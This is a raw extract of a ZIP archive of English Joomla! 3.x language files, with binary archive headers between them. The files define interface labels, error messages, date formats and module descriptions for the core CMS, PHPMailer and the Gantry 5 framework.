JGLOBAL_AUTH_PASS_BLANK="LDAP can't have blank password"
JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED="Result Unknown. Access Denied"
JGLOBAL_AUTH_USER_BLACKLISTED="User is blacklisted."
JGLOBAL_AUTH_USER_NOT_FOUND="Unable to find user"
JGLOBAL_AUTO="Auto"
JGLOBAL_CATEGORY_NOT_FOUND="Category not found"
JGLOBAL_CENTER="Center"
JGLOBAL_CHECK_ALL="Check All Items"
JGLOBAL_CLICK_TO_SORT_THIS_COLUMN="Select to sort by this column"
JGLOBAL_COLLAPSE_CATEGORIES="Show less categories"
JGLOBAL_CREATED_DATE_ON="Created on %s"
JGLOBAL_CUSTOM_CATEGORY="New Categories"
JGLOBAL_DESCRIPTION="Description"
JGLOBAL_DISPLAY_NUM="Display #"
JGLOBAL_EDIT="Edit"
JGLOBAL_EDIT_TITLE="Edit article"
JGLOBAL_EMAIL="Email"
JGLOBAL_EMAIL_DOMAIN_NOT_ALLOWED="The email domain <strong>%s</strong> is not allowed. Please enter another email address."
JGLOBAL_EMAIL_TITLE="Email this link to a friend"
JGLOBAL_EXPAND_CATEGORIES="Show more categories"
JGLOBAL_FIELD_ADD="Add"
JGLOBAL_FIELD_CATEGORIES_CHOOSE_CATEGORY_DESC="Categories that are within this category will be displayed."
JGLOBAL_FIELD_CATEGORIES_CHOOSE_CATEGORY_LABEL="Select a Top Level Category"
JGLOBAL_FIELD_CATEGORIES_DESC_DESC="If you enter some text in this field, it will replace the Top Level Category Description, if it has one."
JGLOBAL_FIELD_CATEGORIES_DESC_LABEL="Alternative Description"
JGLOBAL_FIELD_CREATED_BY_ALIAS_DESC="Uses another name than the author's for display."
JGLOBAL_FIELD_CREATED_BY_ALIAS_LABEL="Author's Alias"
JGLOBAL_FIELD_CREATED_BY_DESC="The user who created this."
JGLOBAL_FIELD_CREATED_BY_LABEL="Created By"
JGLOBAL_FIELD_CREATED_DESC="Created Date."
JGLOBAL_FIELD_CREATED_LABEL="Created Date"
JGLOBAL_FIELD_FEATURED_DESC="Assign the article to the featured blog layout."
JGLOBAL_FIELD_FEATURED_LABEL="Featured"
JGLOBAL_FIELD_FIELD_CACHETIME_DESC="The number of minutes before the cache is refreshed."
JGLOBAL_FIELD_FIELD_ORDERING_DESC="Order items will be displayed in."
JGLOBAL_FIELD_FIELD_ORDERING_LABEL="Order"
JGLOBAL_FIELD_GROUPS="Field Groups"
JGLOBAL_FIELD_ID_DESC="Record number in the database."
JGLOBAL_FIELD_ID_LABEL="ID"
JGLOBAL_FIELD_LAYOUT_DESC="Default layout to use for items."
JGLOBAL_FIELD_LAYOUT_LABEL="Choose a Layout"
JGLOBAL_FIELD_MODIFIED_LABEL="Modified Date"
JGLOBAL_FIELD_MODIFIED_BY_DESC="The user who did the last modification."
JGLOBAL_FIELD_MODIFIED_BY_LABEL="Modified By"
JGLOBAL_FIELD_MOVE="Move"
JGLOBAL_FIELD_NUM_CATEGORY_ITEMS_DESC="Number of categories to display for each level."
JGLOBAL_FIELD_NUM_CATEGORY_ITEMS_LABEL="Number of Categories"
JGLOBAL_FIELD_PUBLISH_DOWN_DESC="An optional date to stop publishing."
JGLOBAL_FIELD_PUBLISH_DOWN_LABEL="Finish Publishing"
JGLOBAL_FIELD_PUBLISH_UP_DESC="An optional date to start publishing."
JGLOBAL_FIELD_PUBLISH_UP_LABEL="Start Publishing"
JGLOBAL_FIELD_REMOVE="Remove"
JGLOBAL_FIELD_SHOW_BASE_DESCRIPTION_DESC="Show description of the top level category or alternatively replace with the text from the description field found in the menu item. If using Root as a top level category, the description field has to be filled."
JGLOBAL_FIELD_SHOW_BASE_DESCRIPTION_LABEL="Top Level Category Description"
JGLOBAL_FIELD_VERSION_NOTE_DESC="Enter an optional note for this version of the item."
JGLOBAL_FIELD_VERSION_NOTE_LABEL="Version Note"
JGLOBAL_FILTER_BUTTON="Filter"
JGLOBAL_FILTER_LABEL="Filter"
JGLOBAL_FULL_TEXT="Full Text"
JGLOBAL_GT="&gt;"
; The following string is deprecated and will be removed with 4.0.
JGLOBAL_HELPREFRESH_BUTTON="Refresh"
JGLOBAL_HITS="Hits"
JGLOBAL_HITS_ASC="Hits ascending"
JGLOBAL_HITS_COUNT="Hits: %s"
JGLOBAL_HITS_DESC="Hits descending"
JGLOBAL_ICON_SEP="|"
JGLOBAL_INHERIT="Inherit"
JGLOBAL_INTRO_TEXT="Intro Text"
JGLOBAL_KEEP_TYPING="Keep typing ..."
JGLOBAL_LEFT="Left"
JGLOBAL_LIST_ALIAS="(<span>Alias</span>: %s)"
JGLOBAL_LIST_ALIAS_NOTE="(<span>Alias</span>: %s, <span>Note</span>: %s)"
JGLOBAL_LOOKING_FOR="Looking for"
JGLOBAL_LT="&lt;"
JGLOBAL_MAXIMUM_UPLOAD_SIZE_LIMIT="Maximum upload size: <strong>%s</strong>"
JGLOBAL_NEWITEMSLAST_DESC="New items default to the last position. Ordering can be changed after this item has been saved."
JGLOBAL_NO_MATCHING_RESULTS="No Matching Results"
JGLOBAL_NUM="#"
JGLOBAL_OTPMETHOD_NONE="Disable Two Factor Authentication"
JGLOBAL_PASSWORD="Password"
JGLOBAL_PASSWORD_RESET_REQUIRED="You are required to reset your password before proceeding."
JGLOBAL_PREVIEW_POSITION="<span>Position:</span> %s"
JGLOBAL_PREVIEW_STYLE="<span>Style:</span> %s"
JGLOBAL_PRINT="Print"
JGLOBAL_PRINT_TITLE="Print article < %s >"
JGLOBAL_RECORD_NUMBER="Record ID: %d"
JGLOBAL_REMEMBER_ME="Remember me"
JGLOBAL_REMEMBER_MUST_LOGIN="For security reasons you must login before editing your personal information."
JGLOBAL_RESOURCE_NOT_FOUND="Resource not found"
JGLOBAL_RIGHT="Right"
JGLOBAL_ROOT="Root"
JGLOBAL_SECRETKEY="Secret Key"
JGLOBAL_SECRETKEY_HELP="If you have enabled two factor authentication in your user account please enter your secret key. If you do not know what this means, you can leave this field blank."
JGLOBAL_SELECT_AN_OPTION="Select an option"
JGLOBAL_SELECT_NO_RESULTS_MATCH="No results match"
JGLOBAL_SELECT_SOME_OPTIONS="Select some options"
JGLOBAL_SORT_BY="Sort Table By:"
JGLOBAL_START_PUBLISH_AFTER_FINISH="Item start publishing date must be before finish publishing date"
JGLOBAL_SUBCATEGORIES="Subcategories"
JGLOBAL_SUBHEADING_DESC="Optional text to show as a subheading."
JGLOBAL_TITLE="Title"
JGLOBAL_TITLE_ASC="Title ascending"
JGLOBAL_TITLE_DESC="Title descending"
JGLOBAL_TYPE_OR_SELECT_CATEGORY="Type or Select a Category"
JGLOBAL_TYPE_OR_SELECT_SOME_OPTIONS="Type or select some options"
JGLOBAL_TYPE_OR_SELECT_SOME_TAGS="Type or select some tags"
JGLOBAL_USE_GLOBAL="Use Global"
JGLOBAL_USE_GLOBAL_VALUE="Use Global (%s)"
JGLOBAL_USERNAME="Username"
JGLOBAL_VALIDATION_FORM_FAILED="Invalid form"
JGLOBAL_YOU_MUST_LOGIN_FIRST="Please login first"

JGRID_HEADING_ACCESS="Access"
JGRID_HEADING_ACCESS_ASC="Access ascending"
JGRID_HEADING_ACCESS_DESC="Access descending"
JGRID_HEADING_ID="ID"
JGRID_HEADING_ID_ASC="ID ascending"
JGRID_HEADING_ID_DESC="ID descending"
JGRID_HEADING_LANGUAGE="Language"
JGRID_HEADING_LANGUAGE_ASC="Language ascending"
JGRID_HEADING_LANGUAGE_DESC="Language descending"
JGRID_HEADING_ORDERING_ASC="Ordering ascending"
JGRID_HEADING_ORDERING_DESC="Ordering descending"

; if there is an error connecting database before initialisation, en-GB.lib_joomla.ini can't be loaded
; we therefore have to load the strings from en-GB.ini

JLIB_DATABASE_ERROR_ADAPTER_MYSQL="The MySQL adapter 'mysql' is not available."
JLIB_DATABASE_ERROR_ADAPTER_MYSQLI="The MySQL adapter 'mysqli' is not available."
JLIB_DATABASE_ERROR_CONNECT_DATABASE="Unable to connect to the Database: %s"
JLIB_DATABASE_ERROR_CONNECT_MYSQL="Could not connect to MySQL."
JLIB_DATABASE_ERROR_DATABASE_CONNECT="Could not connect to database"
JLIB_DATABASE_ERROR_LOAD_DATABASE_DRIVER="Unable to load Database Driver: %s"
JLIB_ERROR_INFINITE_LOOP="Infinite loop detected in JError"

JOPTION_DO_NOT_USE="- None Selected -"
JOPTION_SELECT_ACCESS="- Select Access -"
JOPTION_SELECT_AUTHOR="- Select Author -"
JOPTION_SELECT_CATEGORY="- Select Category -"
JOPTION_SELECT_LANGUAGE="- Select Language -"
JOPTION_SELECT_PUBLISHED="- Select Status -"
JOPTION_SELECT_MAX_LEVELS="- Select Max Levels -"
JOPTION_SELECT_MONTH="- Select Month -"
JOPTION_SELECT_TAG="- Select Tag -"
JOPTION_USE_DEFAULT="- Use Default -"

JSEARCH_FILTER_CLEAR="Clear"
JSEARCH_FILTER_LABEL="Filter"
JSEARCH_FILTER_SUBMIT="Search"
JSEARCH_FILTER="Search"

DATE_FORMAT_LC="l, d F Y"
DATE_FORMAT_LC1="l, d F Y"
DATE_FORMAT_LC2="l, d F Y H:i"
DATE_FORMAT_LC3="d F Y"
DATE_FORMAT_LC4="Y-m-d"
DATE_FORMAT_LC5="Y-m-d H:i"
DATE_FORMAT_LC6="Y-m-d H:i:s"
DATE_FORMAT_JS1="y-m-d"
DATE_FORMAT_CALENDAR_DATE="%Y-%m-%d"
DATE_FORMAT_CALENDAR_DATETIME="%Y-%m-%d %H:%M:%S"
DATE_FORMAT_FILTER_DATE="Y-m-d"
DATE_FORMAT_FILTER_DATETIME="Y-m-d H:i:s"

; Months

JANUARY_SHORT="Jan"
JANUARY="January"
FEBRUARY_SHORT="Feb"
FEBRUARY="February"
MARCH_SHORT="Mar"
MARCH="March"
APRIL_SHORT="Apr"
APRIL="April"
MAY_SHORT="May"
MAY="May"
JUNE_SHORT="Jun"
JUNE="June"
JULY_SHORT="Jul"
JULY="July"
AUGUST_SHORT="Aug"
AUGUST="August"
SEPTEMBER_SHORT="Sep"
SEPTEMBER="September"
OCTOBER_SHORT="Oct"
OCTOBER="October"
NOVEMBER_SHORT="Nov"
NOVEMBER="November"
DECEMBER_SHORT="Dec"
DECEMBER="December"

;Days of the Week
SAT="Sat"
SATURDAY="Saturday"
SUN="Sun"
SUNDAY="Sunday"
MON="Mon"
MONDAY="Monday"
TUE="Tue"
TUESDAY="Tuesday"
WED="Wed"
WEDNESDAY="Wednesday"
THU="Thu"
THURSDAY="Thursday"
FRI="Fri"
FRIDAY="Friday"

; Localised number format

DECIMALS_SEPARATOR="."
THOUSANDS_SEPARATOR=","

; Time Zones - this data has been removed as it is no longer used by Joomla 3.x

PHPMAILER_PROVIDE_ADDRESS="You must provide at least one recipient email address."
PHPMAILER_MAILER_IS_NOT_SUPPORTED="Mailer is not supported."
PHPMAILER_EXECUTE="Could not execute: "
PHPMAILER_EXTENSION_MISSING="Extension missing: "
PHPMAILER_INSTANTIATE="Could not start mail function."
PHPMAILER_AUTHENTICATE="SMTP Error! Could not authenticate."
PHPMAILER_FROM_FAILED="The following from address failed: "
PHPMAILER_RECIPIENTS_FAILED="SMTP Error! The following recipients failed: "
PHPMAILER_DATA_NOT_ACCEPTED="SMTP Error! Data not accepted."
PHPMAILER_CONNECT_HOST="SMTP Error! Could not connect to SMTP host."
PHPMAILER_FILE_ACCESS="Could not access file: "
PHPMAILER_FILE_OPEN="File Error: Could not open file: "
PHPMAILER_ENCODING="Unknown encoding: "
PHPMAILER_SIGNING_ERROR="Signing error: "
PHPMAILER_SMTP_ERROR="SMTP server error: "
PHPMAILER_EMPTY_MESSAGE="Empty message body"
PHPMAILER_INVALID_ADDRESS="Invalid address"
PHPMAILER_VARIABLE_SET="Can't set or reset variable: "
PHPMAILER_SMTP_CONNECT_FAILED="SMTP connect failed"
PHPMAILER_TLS="Could not start TLS"

; Database types (allows for a more descriptive label than the internal name)
MYSQL="MySQL"
MYSQLI="MySQLi"
ORACLE="Oracle"
PGSQL="PostgreSQL (PDO)"
PDOMYSQL="MySQL (PDO)"
POSTGRESQL="PostgreSQL"
SQLAZURE="Microsoft SQL Azure"
SQLITE="SQLite"
SQLSRV="Microsoft SQL Server"

; Search tools
JSEARCH_TOOLS="Search Tools"
JSEARCH_TOOLS_DESC="Filter the list items."
JSEARCH_TOOLS_ORDERING="Order by:"
PK!�Jp��#en-GB/en-GB.mod_articles_latest.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_LATEST="Articles - Latest"
MOD_LATEST_NEWS_FIELD_AUTHOR_DESC="Select one or more authors."
MOD_LATEST_NEWS_FIELD_AUTHOR_LABEL="Created by Author(s)"
MOD_LATEST_NEWS_FIELD_CATEGORY_DESC="Selects Articles from one or more Categories. If no selection will show all categories as default."
MOD_LATEST_NEWS_FIELD_COUNT_DESC="The number of Articles to display (the default is 5)."
MOD_LATEST_NEWS_FIELD_COUNT_LABEL="Count"
MOD_LATEST_NEWS_FIELD_FEATURED_DESC="Show or hide articles marked as featured."
MOD_LATEST_NEWS_FIELD_FEATURED_LABEL="Featured Articles"
MOD_LATEST_NEWS_FIELD_ORDERING_DESC="Recently Added First: order the articles using their creation date<br />Recently Modified First: order the articles using their modification date<br />Recently Published First: order the articles using their publication date.<br />Recently Touched First: order the articles using their modification or creation dates."
MOD_LATEST_NEWS_FIELD_ORDERING_LABEL="Order"
MOD_LATEST_NEWS_FIELD_USER_DESC="Filter by author."
MOD_LATEST_NEWS_FIELD_USER_LABEL="Authors"
MOD_LATEST_NEWS_VALUE_ADDED_BY_ME="Added or modified by me"
MOD_LATEST_NEWS_VALUE_ANYONE="Anyone"
MOD_LATEST_NEWS_VALUE_CREATED_BY="Created by"
MOD_LATEST_NEWS_VALUE_NOTADDED_BY_ME="Not added or modified by me"
MOD_LATEST_NEWS_VALUE_ONLY_SHOW_FEATURED="Only show Featured Articles"
MOD_LATEST_NEWS_VALUE_RECENT_ADDED="Recently Added First"
MOD_LATEST_NEWS_VALUE_RECENT_MODIFIED="Recently Modified First"
MOD_LATEST_NEWS_VALUE_RECENT_RAND="Random Articles"
MOD_LATEST_NEWS_VALUE_RECENT_PUBLISHED="Recently Published First"
MOD_LATEST_NEWS_VALUE_RECENT_TOUCHED="Recently Touched First"
MOD_LATEST_NEWS_XML_DESCRIPTION="This module shows a list of the most recently published and current Articles."
PK!M���(en-GB/en-GB.mod_articles_archive.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_ARCHIVE="Articles - Archived"
MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION="This module shows a list of the calendar months with Archived Articles. After you have changed the status of an Article to Archived, this list will be automatically generated."
MOD_ARTICLES_ARCHIVE_LAYOUT_DEFAULT="Default"

PK!�����en-GB/en-GB.lib_fof.ininu&1i�; @package     FrameworkOnFramework
; @copyright   Copyright (C) 2010 - 2015 Nicholas K. Dionysopoulos / Akeeba Ltd. All rights reserved.
; @license     GNU General Public License version 2, or later

LIB_FOF_DOWNLOAD_ERR_COULDNOTDOWNLOADFROMURL="Could not download from %s"
LIB_FOF_DOWNLOAD_ERR_COULDNOTWRITELOCALFILE="Local file %s is not writeable"
LIB_FOF_DOWNLOAD_ERR_CURL_ERROR="The download failed: cURL error %s: %s"
LIB_FOF_DOWNLOAD_ERR_HTTPERROR="Unexpected HTTP status %s"PK!���FFen-GB/en-GB.mod_menu.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_MENU="Menu"
MOD_MENU_FIELD_ACTIVE_DESC="Select a menu item to always be used as the base for the menu display. You must set the Start Level to the same level or higher than the level of the base item. This will cause the module to be displayed on all assigned pages. If Current is selected the active item is used as the base. This causes the module to only display when the parent menu item is active."
MOD_MENU_FIELD_ACTIVE_LABEL="Base Item"
MOD_MENU_FIELD_ALLCHILDREN_DESC="Expand the menu and make its sub-menu items always visible."
MOD_MENU_FIELD_ALLCHILDREN_LABEL="Show Sub-menu Items"
MOD_MENU_FIELD_CLASS_DESC="A suffix to be applied to the CSS class of the menu items."
MOD_MENU_FIELD_CLASS_LABEL="Menu Class Suffix"
MOD_MENU_FIELD_ENDLEVEL_DESC="Level to stop rendering the menu at. If you choose 'All', all levels will be shown depending on 'Show Sub-menu Items' setting."
MOD_MENU_FIELD_ENDLEVEL_LABEL="End Level"
MOD_MENU_FIELD_MENUTYPE_DESC="Select a menu in the list."
MOD_MENU_FIELD_MENUTYPE_LABEL="Select Menu"
MOD_MENU_FIELD_STARTLEVEL_DESC="Level to start rendering the menu at. Setting the start and end levels to the same # and setting 'Show Sub-menu Items' to yes will only display that single level."
MOD_MENU_FIELD_STARTLEVEL_LABEL="Start Level"
MOD_MENU_FIELD_TAG_ID_DESC="An ID attribute to assign to the root ul tag of the menu (optional)."
MOD_MENU_FIELD_TAG_ID_LABEL="Menu Tag ID"
MOD_MENU_FIELD_TARGET_DESC="JavaScript values to position a popup window, eg top=50, left=50, width=200, height=300."
MOD_MENU_FIELD_TARGET_LABEL="Target Position"
MOD_MENU_XML_DESCRIPTION="This module displays a menu on the Frontend."
PK!����$en-GB/en-GB.mod_tags_similar.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_TAGS_SIMILAR="Tags - Similar"
MOD_TAGS_SIMILAR_LAYOUT_DEFAULT="Default"
MOD_TAGS_SIMILAR_XML_DESCRIPTION="The Similar Tags Module displays links to other items with similar tags. The closeness of the match can be specified."

PK!������+en-GB/en-GB.mod_articles_categories.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_CATEGORIES="Articles - Categories"
MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION="This module displays a list of categories from one parent category."
MOD_ARTICLES_CATEGORIES_LAYOUT_DEFAULT="Default"

PK!;T�@��(en-GB/en-GB.mod_articles_popular.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_POPULAR="Articles - Most Read"
MOD_POPULAR_XML_DESCRIPTION="This module shows a list of the published Articles which have the highest number of page views."
MOD_ARTICLES_POPULAR_LAYOUT_DEFAULT="Default"

PK!��O���en-GB/en-GB.mod_footer.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8
; Note : %date% will be auto replaced by current year !Don't translate

MOD_FOOTER="Footer"
MOD_FOOTER_XML_DESCRIPTION="This module shows the Joomla! copyright information."
MOD_FOOTER_LAYOUT_DEFAULT="Default"

PK!�"{/**en-GB/en-GB.mod_syndicate.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_SYNDICATE="Syndication Feeds"
MOD_SYNDICATE_DEFAULT_FEED_ENTRIES="Feed Entries"
MOD_SYNDICATE_FIELD_DISPLAYTEXT_DESC="If set to 'Yes', text will be displayed next to the icon."
MOD_SYNDICATE_FIELD_DISPLAYTEXT_LABEL="Display Text"
MOD_SYNDICATE_FIELD_FORMAT_DESC="Select the format for the Syndication Feed."
MOD_SYNDICATE_FIELD_FORMAT_LABEL="Feed Format"
MOD_SYNDICATE_FIELD_TEXT_DESC="If 'Display Text' is activated, the text entered will be displayed next to the icon along with the RSS Link. If this field is left empty, the default text displayed will be picked from the site language ini file."
MOD_SYNDICATE_FIELD_TEXT_LABEL="Text"
MOD_SYNDICATE_FIELD_VALUE_ATOM="Atom 1.0"
MOD_SYNDICATE_FIELD_VALUE_RSS="RSS 2.0"
MOD_SYNDICATE_XML_DESCRIPTION="Smart Syndication Module that creates a Syndicated Feed for the page where the Module is displayed."PK!Ѷ����en-GB/en-GB.com_mailto.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_MAILTO="Mailto"
COM_MAILTO_CANCEL="Cancel"
COM_MAILTO_CAPTCHA="Captcha"
COM_MAILTO_CLOSE_WINDOW="Close Window"
COM_MAILTO_EMAIL_ERR_NOINFO="Please provide a valid email address."
COM_MAILTO_EMAIL_INVALID="The address '%s' does not appear to be a valid email address."
COM_MAILTO_EMAIL_MSG="This is an email from (%s) sent by %s (%s). You may also find the following link interesting: %s"
COM_MAILTO_EMAIL_NOT_SENT="Email could not be sent."
COM_MAILTO_EMAIL_SENT="Email was sent."
COM_MAILTO_EMAIL_TO="Email to"
COM_MAILTO_EMAIL_TO_A_FRIEND="Email this link to a friend."
COM_MAILTO_LINK_IS_MISSING="Link is missing"
COM_MAILTO_SEND="Send"
COM_MAILTO_SENDER="Sender"
COM_MAILTO_SENT_BY="Item sent by %s"
COM_MAILTO_SUBJECT="Subject"
COM_MAILTO_YOUR_EMAIL="Your Email"
PK!��?NNen-GB/en-GB.mod_menu.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_MENU="Menu"
MOD_MENU_XML_DESCRIPTION="This module displays a menu on the Frontend."
MOD_MENU_LAYOUT_DEFAULT="Default"

PK!e#:�ccen-GB/en-GB.mod_finder.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_FINDER="Smart Search"
MOD_FINDER_XML_DESCRIPTION="This is a search module for the Smart Search system."
MOD_FINDER_LAYOUT_DEFAULT="Default"
PK!������en-GB/en-GB.mod_footer.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8
; Note : %date% will be auto replaced by current year !Don't translate

MOD_FOOTER="Footer"
MOD_FOOTER_LINE1="Copyright &#169; %date% %sitename%. All Rights Reserved."
MOD_FOOTER_LINE2="<a href="_QQ_"https://www.joomla.org"_QQ_">Joomla!</a> is Free Software released under the <a href="_QQ_"https://www.gnu.org/licenses/gpl-2.0.html"_QQ_">GNU General Public License.</a>"
MOD_FOOTER_XML_DESCRIPTION="This module shows the Joomla! copyright information."
PK!�bf%��%en-GB/en-GB.mod_articles_news.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_NEWS="Articles - Newsflash"
MOD_ARTICLES_NEWS_XML_DESCRIPTION="The Newsflash Module will display a fixed number of articles from a specific category."
MOD_ARTICLES_NEWS_LAYOUT_DEFAULT="Default"

PK!�7���en-GB/en-GB.pkg_gantry5.sys.ininu&1i�PKG_GANTRY5="Gantry 5"
PKG_GANTRY5_DESCRIPTION="Gantry 5 Framework Package. Contains library, component, Nucleus engine and system & quick icon plugins."
PK!��E�en-GB/en-GB.tpl_beez3.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_BEEZ3_POSITION_DEBUG="Debug"
TPL_BEEZ3_POSITION_POSITION-0="Search"
TPL_BEEZ3_POSITION_POSITION-10="Footer middle"
TPL_BEEZ3_POSITION_POSITION-11="Footer bottom"
TPL_BEEZ3_POSITION_POSITION-12="Middle top"
TPL_BEEZ3_POSITION_POSITION-13="Unused"
TPL_BEEZ3_POSITION_POSITION-14="Footer last"
TPL_BEEZ3_POSITION_POSITION-15="Header"
TPL_BEEZ3_POSITION_POSITION-1="Top"
TPL_BEEZ3_POSITION_POSITION-2="Breadcrumbs"
TPL_BEEZ3_POSITION_POSITION-3="Right bottom"
TPL_BEEZ3_POSITION_POSITION-4="Left middle"
TPL_BEEZ3_POSITION_POSITION-5="Left bottom"
TPL_BEEZ3_POSITION_POSITION-6="Right top"
TPL_BEEZ3_POSITION_POSITION-7="Left top"
TPL_BEEZ3_POSITION_POSITION-8="Right middle"
TPL_BEEZ3_POSITION_POSITION-9="Footer top"
TPL_BEEZ3_XML_DESCRIPTION="Accessible site template for Joomla! 3.x. Beez3, the HTML5 version."
PK!�P�Q11%en-GB/en-GB.files_gantry5_nucleus.ininu&1i�GANTRY5_ENGINE_SORRY_NO_CONTENT="Sorry, no content"
GANTRY5_ENGINE_UNKNOWN_ERROR="Unknown error"

GANTRY5_ENGINE_NICETIME_NO_DATE_PROVIDED="No date provided"
GANTRY5_ENGINE_NICETIME_BAD_DATE="Bad date"
GANTRY5_ENGINE_NICETIME_AGO="ago"
GANTRY5_ENGINE_NICETIME_FROM_NOW="from now"
GANTRY5_ENGINE_NICETIME_JUST_NOW="just now"
GANTRY5_ENGINE_NICETIME_SECOND="second"
GANTRY5_ENGINE_NICETIME_MINUTE="minute"
GANTRY5_ENGINE_NICETIME_HOUR="hour"
GANTRY5_ENGINE_NICETIME_DAY="day"
GANTRY5_ENGINE_NICETIME_WEEK="week"
GANTRY5_ENGINE_NICETIME_MONTH="month"
GANTRY5_ENGINE_NICETIME_YEAR="year"
GANTRY5_ENGINE_NICETIME_DECADE="decade"
GANTRY5_ENGINE_NICETIME_SEC="sec"
GANTRY5_ENGINE_NICETIME_MIN="min"
GANTRY5_ENGINE_NICETIME_HR="hr"
GANTRY5_ENGINE_NICETIME_WK="wk"
GANTRY5_ENGINE_NICETIME_MO="mo"
GANTRY5_ENGINE_NICETIME_YR="yr"
GANTRY5_ENGINE_NICETIME_DEC="dec"
GANTRY5_ENGINE_NICETIME_SECOND_PLURAL="seconds"
GANTRY5_ENGINE_NICETIME_MINUTE_PLURAL="minutes"
GANTRY5_ENGINE_NICETIME_HOUR_PLURAL="hours"
GANTRY5_ENGINE_NICETIME_DAY_PLURAL="days"
GANTRY5_ENGINE_NICETIME_WEEK_PLURAL="weeks"
GANTRY5_ENGINE_NICETIME_MONTH_PLURAL="months"
GANTRY5_ENGINE_NICETIME_YEAR_PLURAL="years"
GANTRY5_ENGINE_NICETIME_DECADE_PLURAL="decades"
GANTRY5_ENGINE_NICETIME_SEC_PLURAL="secs"
GANTRY5_ENGINE_NICETIME_MIN_PLURAL="mins"
GANTRY5_ENGINE_NICETIME_HR_PLURAL="hrs"
GANTRY5_ENGINE_NICETIME_WK_PLURAL="wks"
GANTRY5_ENGINE_NICETIME_MO_PLURAL="mos"
GANTRY5_ENGINE_NICETIME_YR_PLURAL="yrs"
GANTRY5_ENGINE_NICETIME_DEC_PLURAL="decs"

GANTRY5_ENGINE_PREV="Prev"
GANTRY5_ENGINE_NEXT="Next"

GANTRY5_X_DAYS="%s days"
PK!'��j��en-GB/en-GB.mod_breadcrumbs.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_BREADCRUMBS="Breadcrumbs"
MOD_BREADCRUMBS_FIELD_HOMETEXT_DESC="This text will be shown as Home entry. If the field is left empty, it will use the default value from the mod_breadcrumbs.ini language file."
MOD_BREADCRUMBS_FIELD_HOMETEXT_LABEL="Text for Home Entry"
MOD_BREADCRUMBS_FIELD_SEPARATOR_DESC="A text separator."
MOD_BREADCRUMBS_FIELD_SEPARATOR_LABEL="Text Separator"
MOD_BREADCRUMBS_FIELD_SHOWHERE_DESC="Show or hide &quot;You are here&quot; text in the pathway."
MOD_BREADCRUMBS_FIELD_SHOWHERE_LABEL="Show &quot;You are here&quot;"
MOD_BREADCRUMBS_FIELD_SHOWHOME_DESC="Show or hide the Home element in the pathway."
MOD_BREADCRUMBS_FIELD_SHOWHOME_LABEL="Show Home"
MOD_BREADCRUMBS_FIELD_SHOWLAST_DESC="Show or hide the last element in the pathway."
MOD_BREADCRUMBS_FIELD_SHOWLAST_LABEL="Show Last"
MOD_BREADCRUMBS_HERE="You are here: "
MOD_BREADCRUMBS_HOME="Home"
MOD_BREADCRUMBS_XML_DESCRIPTION="This module displays the Breadcrumbs."PK!~�����%en-GB/en-GB.mod_related_items.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_RELATED_ITEMS="Articles - Related"
MOD_RELATED_XML_DESCRIPTION="This module displays other Articles that are related to the one being viewed. These relations are established by the Meta keywords. <br />All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on &quot;Breeding Parrots&quot; and another on &quot;Hand Raising Black Cockatoos&quot;. If you include the keyword &quot;parrot&quot; in both Articles, then the Related Items Module will list the &quot;Breeding Parrots&quot; Article when viewing &quot;Hand Raising Black Cockatoos&quot; and vice-versa."
